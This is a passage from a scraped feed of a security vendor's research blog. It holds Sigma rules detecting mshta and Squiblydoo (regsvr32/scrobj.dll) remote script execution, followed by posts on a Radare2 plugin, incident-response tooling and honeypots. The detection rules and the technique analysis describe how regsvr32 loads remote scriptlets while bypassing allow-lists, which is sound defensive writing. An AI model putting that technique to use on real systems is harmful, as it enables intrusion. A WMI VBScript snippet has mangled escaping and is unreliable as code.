&lt;div&gt;&lt;pre&gt;&lt;code&gt;title: mshta execution with command line arguments
author: Intezer
logsource:
category: process_creation
product: windows
detection:
selection:
Image: &amp;#39;*mshta.exe&amp;#39;
CommandLine|contains:
- &amp;#39;javascript&amp;#39;
- &amp;#39;*.hta&amp;#39;
- &amp;#39;vbscript&amp;#39;
- &amp;#39;http&amp;#39;
- &amp;#39;https&amp;#39;
condition: selection&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;Technique name: Squiblydoo&lt;span class="hx:absolute hx:-mt-20" id="technique-name-squiblydoo"&gt;&lt;/span&gt;
&lt;a href="#technique-name-squiblydoo" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;MITRE: &lt;a href="https://attack.mitre.org/techniques/T1218/010/"target="_blank" rel="noopener"&gt;https://attack.mitre.org/techniques/T1218/010/&lt;/a&gt;&lt;/p&gt;
&lt;h4&gt;Analysis&lt;span class="hx:absolute hx:-mt-20" id="analysis-2"&gt;&lt;/span&gt;
&lt;a href="#analysis-2" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;Regsvr32 is a command-line utility to manage the registration of DLLs and
ActiveX controls in the Registry. Squiblydoo is a technique that was discovered
by Casey Smith, it allows the usage of Regsvr32 to load and execute COM
scriptlet (JScript or VBScript embedded in XML file) from a remote server.&lt;/p&gt;
&lt;p&gt;This method is very stealthy. It doesn&amp;rsquo;t make any changes to the Registry and
it bypasses application control and allow-lists as the code is executed under
user permissions by Regsvr32.&lt;/p&gt;
&lt;h4&gt;Real Life Example&lt;span class="hx:absolute hx:-mt-20" id="real-life-example-2"&gt;&lt;/span&gt;
&lt;a href="#real-life-example-2" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;&lt;a href="https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets"target="_blank" rel="noopener"&gt;Leviathan&lt;/a&gt;
is an espionage group that uses Squiblydoo to execute malicious Dlls.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.mandiant.com/resources/phished-at-the-request-of-counsel"target="_blank" rel="noopener"&gt;APT19&lt;/a&gt;
uses Squiblydoo to bypass whitelisting and execute arbitrary code on the
victim&amp;rsquo;s machine.&lt;/p&gt;
&lt;h4&gt;How to detect&lt;span class="hx:absolute hx:-mt-20" id="how-to-detect-2"&gt;&lt;/span&gt;
&lt;a href="#how-to-detect-2" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;Regsvr32 has several command line
&lt;a href="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32"target="_blank" rel="noopener"&gt;arguments&lt;/a&gt;,
there is a suspicious combination of arguments that can be a good indication
that the binary is invoked by attackers:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;/s will silently execute the command without printing messages&lt;/li&gt;
&lt;li&gt;/i passes a command line string to
&lt;a href="https://docs.microsoft.com/en-gb/windows/win32/api/shlwapi/nf-shlwapi-dllinstall?redirectedfrom=MSDN"target="_blank" rel="noopener"&gt;DllInstall&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In addition, this method uses scrobj.dll to execute COM scriptlet. To detect
these suspicious process execution we made the Sigma rule below that alerts
upon suspicious parent processes.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;title: detect Squiblydoo
logsource:
product: windows
category: process_creation
detection:
selection:
Image|endswith: &amp;#39;regsvr32.exe&amp;#39;
CommandLine|contains|all:
- &amp;#39;/i:&amp;#39;
- &amp;#39;/s&amp;#39;
CommandLine|contains:
- &amp;#39;http&amp;#39;
- &amp;#39;https&amp;#39;
- &amp;#39;ftp&amp;#39;
CommandLine|endswith: &amp;#39;scrobj.dll&amp;#39;
condition: selection&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;To check if a scriptlet file implements this Squiblydoo, use
&lt;a href="https://github.com/mikesxrs/Open-Source-YARA-rules/blob/master/RSA/Squiblydoo.yar"target="_blank" rel="noopener"&gt;this&lt;/a&gt;
YARA rule to detect files that may potentially use this technique.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/03/boost-your-soc-skills-how-to-detect-good-apps-gone-bad/images/fig2.png" title="Yara rule for detecting possible Squiblydoo scriptlet." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Yara rule for detecting possible Squiblydoo scriptlet.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h3&gt;Technique Name: Windows Management Instrumentation (WMI)&lt;span class="hx:absolute hx:-mt-20" id="technique-name-windows-management-instrumentation-wmi"&gt;&lt;/span&gt;
&lt;a href="#technique-name-windows-management-instrumentation-wmi" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;h4&gt;Analysis&lt;span class="hx:absolute hx:-mt-20" id="analysis-3"&gt;&lt;/span&gt;
&lt;a href="#analysis-3" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;Windows Management Instrumentation (WMI) is an interface through which a
program or script can perform operations or manage data on a Windows operating
&lt;a href="https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page"target="_blank" rel="noopener"&gt;system&lt;/a&gt;.
WMI gives access to many Windows components, and is therefore heavily leveraged
by threat actors to execute behaviors for gathering information, executing
additional payloads, and lateral movement.&lt;/p&gt;
&lt;p&gt;WMI is often used in VBScript. To connect to a WMI namespace in VBScript, the
function GetObject can be used with a WMI object path that specifies the
namespace that holds the desired classes that you wish to use. The most popular
are located in the rootcimv2 namespace.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;strComputer = &amp;#34;.&amp;#34;
Set objWMIService = GetObject(&amp;#34;winmgmts:\ &amp;amp; strComputer &amp;amp; &amp;#34;&amp;#34;rootcimv2&amp;#34;&amp;#34;)&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;</description></item><item><title>Radare Plugin is Here for Intezer Community</title><link>https://research.intezer.com/blog/2022/02/radare-plugin-automate-reverse-engineering/</link><pubDate>Tue, 08 Feb 2022 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2022/02/radare-plugin-automate-reverse-engineering/</guid><description>
&lt;p&gt;When you reverse engineer code as part of an incident response team, you want
to quickly get information about what kind of threat you&amp;rsquo;re dealing with.&lt;/p&gt;
&lt;p&gt;A while back we released Intezer Analyze plugins both for
&lt;a href="https://intezer.com/blog/malware-analysis/ida-pro-plugin-now-available-to-the-community/"target="_blank" rel="noopener"&gt;IDA Pro&lt;/a&gt;
and
&lt;a href="https://intezer.com/blog/malware-analysis/community-ghidra-plugin-is-here/"target="_blank" rel="noopener"&gt;Ghidra&lt;/a&gt;
to help you zero in on a file&amp;rsquo;s malicious and unique code. Now it is Radare&amp;rsquo;s
turn. &lt;a href="https://rada.re/n/radare2.html"target="_blank" rel="noopener"&gt;Radare2&lt;/a&gt; (r2) is an open-source tool
chain for reverse engineering and forensics. With the release of the community
plugin &lt;code&gt;r2analyze&lt;/code&gt;, r2 users can now supercharge their reversing session with
code genomics from Intezer to attribute the malware family or threat actor.&lt;/p&gt;
&lt;h2&gt;The Radare Plugin for Reverse Engineering&lt;span class="hx:absolute hx:-mt-20" id="the-radare-plugin-for-reverse-engineering"&gt;&lt;/span&gt;
&lt;a href="#the-radare-plugin-for-reverse-engineering" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;How to get started:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Make sure you have an Intezer Analyze community account, or a paid team
account. (If not, register &lt;a href="https://analyze.intezer.com/"target="_blank" rel="noopener"&gt;here&lt;/a&gt;.)&lt;/li&gt;
&lt;li&gt;Submit the file to Intezer Analyze.&lt;/li&gt;
&lt;li&gt;Install the plugin via pip: &lt;code&gt;pip install r2analyze&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Add your API key as an environment variable named &lt;code&gt;INTEZER_API_KEY&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Open the file in r2 and perform an initial analysis (&lt;code&gt;aaa&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;Run the plugin as a r2pipe command (&lt;code&gt;#!pipe r2analyze&lt;/code&gt;).&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Here is an example using a ScarCruft sample
(&lt;a href="https://analyze.intezer.com/files/7c82689142a415b0a34553478e445988980f48705735939d6d33c17e4e8dac94"target="_blank" rel="noopener"&gt;&lt;code&gt;7c82689142a415b0a34553478e445988980f48705735939d6d33c17e4e8dac94&lt;/code&gt;&lt;/a&gt;).
The
&lt;a href="https://analyze.intezer.com/files/7c82689142a415b0a34553478e445988980f48705735939d6d33c17e4e8dac94"target="_blank" rel="noopener"&gt;result&lt;/a&gt;
from Intezer Analyze is shown below.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/02/radare-plugin-automate-reverse-engineering/images/fig1.png" title="Intezer Analyze result for a ScarCruft sample." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Intezer Analyze result for a ScarCruft sample.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;If you open the sample and run the plugin, you can see below that four items in
the flag space called &lt;code&gt;gene&lt;/code&gt; have been created.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/02/radare-plugin-automate-reverse-engineering/images/fig2.png" title="Executing r2analyze as a r2pipe plugin." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Executing r2analyze as a r2pipe plugin.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;If selecting only that flag space and listing all the flags, you can see that
four functions have been identified as unique to ScarCruft.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/02/radare-plugin-automate-reverse-engineering/images/fig3.png" title="Listing detected functions." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Listing detected functions.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;If Radare2 is your preferred framework for reverse-engineering and analyzing
binaries, now you can use this Intezer Analyze plugin to save time and get
additional insights for your incident response team.&lt;/p&gt;
&lt;p&gt;Intezer automates the malware analysis process to quickly identify and classify
malware families. Analyze malware and unknown files for free at
&lt;a href="https://analyze.intezer.com/"target="_blank" rel="noopener"&gt;analyze.intezer.com&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;Additional Resources&lt;span class="hx:absolute hx:-mt-20" id="additional-resources"&gt;&lt;/span&gt;
&lt;a href="#additional-resources" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;&lt;a href="https://intezer.com/blog/malware-analysis/ida-pro-plugin-now-available-to-the-community/"target="_blank" rel="noopener"&gt;IDA Pro plugin&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://intezer.com/blog/malware-analysis/community-ghidra-plugin-is-here/"target="_blank" rel="noopener"&gt;Ghidra plugin&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>3 Ways to Save Incident Response Time</title><link>https://research.intezer.com/blog/2022/01/save-incident-response-time-intezer-analyze/</link><pubDate>Mon, 31 Jan 2022 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2022/01/save-incident-response-time-intezer-analyze/</guid><description>
&lt;p&gt;When there is suspicious activity on an endpoint, the incident response team is responsible for investigating it to find out what happened in the network that caused the potential security breach. Is it a fast-spreading malware… or just a false positive? For anyone in digital forensics and incident response, you need to know ASAP if it&amp;rsquo;s the first, but you also don&amp;rsquo;t want to waste time investigating false positives.&lt;/p&gt;
&lt;p&gt;There are several ways to collect files and forensics evidence, which we&amp;rsquo;ll dig into below with tips and free tools to save you time on each during incident response. These are three key areas we&amp;rsquo;ll look at where you can speed up investigations:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;HD forensics:&lt;/strong&gt; Collecting suspicious files based on a predefined incident response plan&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Memory forensics:&lt;/strong&gt; Using tools to get the memory dump of the compromised endpoint&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Live forensics:&lt;/strong&gt; Scanning the runtime of the compromised endpoint&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;First, one of the most time consuming IR processes is determining if the suspicious activity was a false positive or not. If an infection did take place, identifying the endpoint(s) in the network that were compromised and the malicious artifacts used in the attack can also be tedious. This analysis should be done thoroughly to ensure that no information crucial to the investigation is missed. It can often feel like looking for a needle in the haystack.&lt;/p&gt;
&lt;p&gt;Since time is a major factor when handling incidents in order to reduce the potential damage to the environment, the stakes for conducting incident investigation and response processes are high. That means you want efficient procedures and tools on hand, so your team isn&amp;rsquo;t stuck with something taking hours of time when it could have been done in minutes.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://analyze.intezer.com"target="_blank" rel="noopener"&gt;Intezer Analyze&lt;/a&gt; is a free tool that can help you quickly classify and analyze files collected by the forensics methods mentioned above. Let&amp;rsquo;s take you through how we&amp;rsquo;ve seen incident response teams use Intezer and other tools to get more information about forensics artifacts in minutes, not hours.&lt;/p&gt;
&lt;h2&gt;HD Forensics and Classifying Collected Files&lt;span class="hx:absolute hx:-mt-20" id="hd-forensics-and-classifying-collected-files"&gt;&lt;/span&gt;
&lt;a href="#hd-forensics-and-classifying-collected-files" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;One of the methods used to collect forensics evidence is taking an image of the compromised endpoint. This essentially makes a copy of the entire filesystem but the extracted output can reach a high volume. Analyzing the extracted data can be very time consuming for incident response teams.&lt;/p&gt;
&lt;p&gt;In many cases, the analysis of extracted data is performed by comparing the signatures to predefined lists of known malicious hashes. While useful for identifying known malware samples, the smallest change made to a file changes its hash completely, making the new variant unrecognizable to signature detection.&lt;/p&gt;
&lt;p&gt;There are millions of trusted and malicious software created each day. Allow lists based on hashes alone are not enough to detect all of the new threats out there.&lt;/p&gt;
&lt;p&gt;Another challenge posed to HD forensics is files with packed payloads. One of the outcomes of an attacker packing a malware sample is it hides the malicious code and creates a new, never-seen-before hash. Since the new hash won&amp;rsquo;t be picked up by existing blocklists, the malware likely won&amp;rsquo;t be detected.&lt;/p&gt;
&lt;p&gt;Intezer Analyze is different from signature detection. Intezer breaks each executable file into binary code patterns, also called code genes. These genes are referenced against Intezer&amp;rsquo;s vast database containing billions of code pieces from both trusted applications and malware. If a file shares code with another malware, it&amp;rsquo;s immediately flagged as malicious, and classified to the malware family it shares code with. This has proven to be very effective for detecting malware variants over time.&lt;/p&gt;
&lt;p&gt;There are two main ways to send files to Intezer Analyze for analysis:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Online:&lt;/strong&gt; Submit a file using the &lt;a href="https://analyze.intezer.com"target="_blank" rel="noopener"&gt;web interface&lt;/a&gt;, either by hash (SHA256, SHA1, MD5) or uploading a file from your device.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Script:&lt;/strong&gt; Submitting a collection or a folder of files and/or hashes at once can be accomplished using a &lt;a href="https://github.com/intezer/analyze-python-sdk/blob/master/examples/analyze_folder.py"target="_blank" rel="noopener"&gt;script&lt;/a&gt; created with Intezer&amp;rsquo;s&lt;/li&gt;
&lt;li&gt;SDK. The output of the script, shown below, contains the details of all files that were identified as malicious or at least suspicious by Intezer Analyze. This method saves you time that would usually have to spend classifying and analyzing files.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/01/save-incident-response-time-intezer-analyze/images/fig1.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;Using a script based on Intezer&amp;rsquo;s SDK to analyze a folder that contains several files. The output provides links to the analysis reports for all the malicious and suspicious files in question, including their verdict, malware family name and SHA256.&lt;/p&gt;
&lt;p&gt;More detailed information can be found on the web UI. If you open the analysis of the last file from the script, you can see the full &lt;a href="https://analyze.intezer.com/files/339620e7f6f5a2b4c511c76488b19bed21e1015afe4b037a7a1b27e07fba0ec2/iocs"target="_blank" rel="noopener"&gt;analysis report&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/01/save-incident-response-time-intezer-analyze/images/fig2.png" title="Analysis of a Loki sample (https://analyze.intezer.com/files/339620e7f6f5a2b4c511c76488b19bed21e1015afe4b037a7a1b27e07fba0ec2)" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Analysis of a Loki sample (https://analyze.intezer.com/files/339620e7f6f5a2b4c511c76488b19bed21e1015afe4b037a7a1b27e07fba0ec2)&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;This sample is identified as a Loki variant since it shares code genes with other samples from the same malware family, seen in the process tree resulting from the execution of the file in a sandbox.&lt;/p&gt;
&lt;p&gt;Next, you can view the TTPs with each technique mapped to the MITRE ATT&amp;amp;CK® framework. Also, the IoCs tab provides network information and hashes of the files that were dropped by the malware. All of this information can be downloaded in a CSV format.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/01/save-incident-response-time-intezer-analyze/images/fig3.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;Under TTPs, you can see that among the capabilities of this sample are that it collects identification information about the system and has information stealing capabilities. This makes sense considering that the sample shares most of its code with Loki, an information stealing malware. The information presented further supports the classification of the file as Loki.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/01/save-incident-response-time-intezer-analyze/images/fig4.png" title="IoCs extracted from the Loki sample can be used to detect similar threats which use the same domains." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;IoCs extracted from the Loki sample can be used to detect similar threats which use the same domains.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Intezer Analyze also provides a code-based vaccine for each threat which can be downloaded in several formats, including YARA, STIX, Stix2, and OpenIOX. Signatures that are based on code are stronger than string-based signatures because they are produced from the specific code that executes a certain functionality in the malware. You can use the vaccine and the information provided in the IoCs and TTPs tabs to detect similar files in the environment using your existing security tools like SIEM, EDR and XDR.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/01/save-incident-response-time-intezer-analyze/images/fig5.png" title="Generating a code-based vaccine in Intezer Analyze." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Generating a code-based vaccine in Intezer Analyze.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;For new threat variants, the analysis may show a portion of unique code as a result of new capabilities and features added to the malware. In this case, an investigator might want to get more information about the threat. If a deeper analysis of the file is needed, Intezer has plugins for &lt;a href="https://analyze.intezer.com/ida-plugin"target="_blank" rel="noopener"&gt;IDA Pro&lt;/a&gt; and &lt;a href="https://github.com/intezer/analyze-community-ghidra-plugin"target="_blank" rel="noopener"&gt;Ghidra&lt;/a&gt;. Both plugins enrich the assembly code with Intezer&amp;rsquo;s unique code reuse insights. These plugins accelerate the reverse engineering process and allow the analyst to focus solely on the malicious components by filtering out the trusted and library code sections.&lt;/p&gt;
&lt;h2&gt;Analyzing Memory Dumps to Improve Incident Response Time&lt;span class="hx:absolute hx:-mt-20" id="analyzing-memory-dumps-to-improve-incident-response-time"&gt;&lt;/span&gt;
&lt;a href="#analyzing-memory-dumps-to-improve-incident-response-time" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Another source of forensics evidence is based on the volatile memory of the compromised endpoint. This method presents the image of all running processes and produces a smaller amount of files which need to be analyzed. There are several popular tools that are used for memory acquisition of Windows machines such as Dumpit, &lt;a href="https://github.com/Velocidex/WinPmem"target="_blank" rel="noopener"&gt;WinPmem&lt;/a&gt;, and Process Hacker. The most common tool to inspect memory dumps is &lt;a href="https://www.volatilityfoundation.org/"target="_blank" rel="noopener"&gt;Volatility&lt;/a&gt;. By using Intezer with the &lt;a href="https://intezer.com/blog/malware-analysis/accelerate-incident-response-with-intezer-analyze-volatility-plugin/"target="_blank" rel="noopener"&gt;Volatility plugin&lt;/a&gt; (available as a free trial), you can get a full code reuse analysis of the memory dump in just a few minutes.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/01/save-incident-response-time-intezer-analyze/images/fig6.png" title="Executing Intezer&amp;#39;s plugin for Volatility on a memory dump." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Executing Intezer&amp;#39;s plugin for Volatility on a memory dump.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;To run the plugin, use your Intezer Analyze API key, which can be passed as an argument or set in the environment variables of the system. The results of the execution can be viewed in the Endpoint and Memory Scans report page and they will look similar to this:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/01/save-incident-response-time-intezer-analyze/images/fig7.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;The memory scan shows the classification of all running code and processes collected from memory and analyzed using the Volatility plugin.&lt;/p&gt;
&lt;p&gt;As you can see, the incident response team benefits from classifying all threats and their capabilities, which normally takes hours or even days when using EDRs.&lt;/p&gt;
&lt;h2&gt;Scan Compromised Endpoints to Detect Threats Loaded In-Memory&lt;span class="hx:absolute hx:-mt-20" id="scan-compromised-endpoints-to-detect-threats-loaded-in-memory"&gt;&lt;/span&gt;
&lt;a href="#scan-compromised-endpoints-to-detect-threats-loaded-in-memory" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The advantage of scanning the runtime of compromised environments is having the ability to detect malicious processes that are being executed, even if they managed to evade detection and bypass other security tools.&lt;/p&gt;
&lt;p&gt;Scanning the runtime environment of the endpoints can be extremely useful for conducting digital forensics and incident response (DFIR). With this approach, once an alert on an endpoint is triggered, the investigator can obtain the memory dump and scan it for any malicious artifacts, making it possible to find the necessary artifacts and narrowing the scope of the investigation around the presented evidence.&lt;/p&gt;
&lt;p&gt;In this case, the Intezer Analyze &lt;a href="https://analyze.intezer.com/?tab=endpoint"target="_blank" rel="noopener"&gt;endpoint scanner&lt;/a&gt; can be executed on a compromised Windows endpoint. It collects all of the loaded processes and analyzes them using Intezer&amp;rsquo;s code comparison technology. You can see the result on the Analyze web UI. The scanner saves investigators not only the effort of collecting memory dumps, but also the time spent analyzing them.&lt;/p&gt;
&lt;p&gt;Below is an endpoint infected with Formbook malware:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/01/save-incident-response-time-intezer-analyze/images/fig8.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;Results from the endpoint scanner show a malicious process that was detected as Formbook information stealer. The scanner quickly picked up the malicious process and identified it without the need for manual investigation.&lt;/p&gt;
&lt;h2&gt;Get the Tools for More Efficient Incident Response&lt;span class="hx:absolute hx:-mt-20" id="get-the-tools-for-more-efficient-incident-response"&gt;&lt;/span&gt;
&lt;a href="#get-the-tools-for-more-efficient-incident-response" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The features, tools and plugins mentioned in this blog are aimed at making the lives of incident responders easier and more efficient. All the tools mentioned above are free or have free trials available. Sign up to &lt;a href="https://analyze.intezer.com"target="_blank" rel="noopener"&gt;Intezer Analyze&lt;/a&gt; for a free community account to start taking advantage of these tools and save time the next time you&amp;rsquo;re investigating an incident.&lt;/p&gt;
&lt;p&gt;Tools mentioned in this article:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://analyze.intezer.com/"target="_blank" rel="noopener"&gt;File analysis with Intezer Analyze&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://analyze.intezer.com/ida-plugin"target="_blank" rel="noopener"&gt;IDA Pro plugin&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/intezer/analyze-community-ghidra-plugin"target="_blank" rel="noopener"&gt;Ghidra plugin&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://analyze.intezer.com/?tab=endpoint"target="_blank" rel="noopener"&gt;Endpoint scanner&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/intezer/analyze-python-sdk"target="_blank" rel="noopener"&gt;Intezer&amp;rsquo;s SDK&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Make your First Malware Honeypot in Under 20 Minutes</title><link>https://research.intezer.com/blog/2022/01/how-to-make-malware-honeypot/</link><pubDate>Thu, 20 Jan 2022 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2022/01/how-to-make-malware-honeypot/</guid><description>
&lt;p&gt;&lt;em&gt;For a free honeypot, you can use one of the several open-source options listed below.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;A &amp;ldquo;honeypot&amp;rdquo; is a metaphor that references using honey as bait for a lure or trap. Honeypots have served many purposes in history, including recruiting spies and catching criminals in real life. Honeypots have also long made their way into computing as a way to gather information about potential threats targeting public facing assets.&lt;/p&gt;
&lt;p&gt;Honeypots are a powerful tool for threat intelligence researchers, security engineers, and malware analysts. Honeypots come in many forms, collecting different information and serving distinct purposes. Honeypots can be used to collect:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;New malware or rampant malware to analyze over time&lt;/li&gt;
&lt;li&gt;Indicators of compromise (IoCs) of malicious IP addresses conducting attacks&lt;/li&gt;
&lt;li&gt;New exploits targeting applications&lt;/li&gt;
&lt;li&gt;They can even be used as a way to waste an attacker&amp;rsquo;s time through deception&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Honeypots serve a powerful purpose for threat intelligence. Having the ability to collect information from attackers in a controlled environment is an important intelligence asset which can help you always stay one step ahead of stopping real attacks before they happen.&lt;/p&gt;
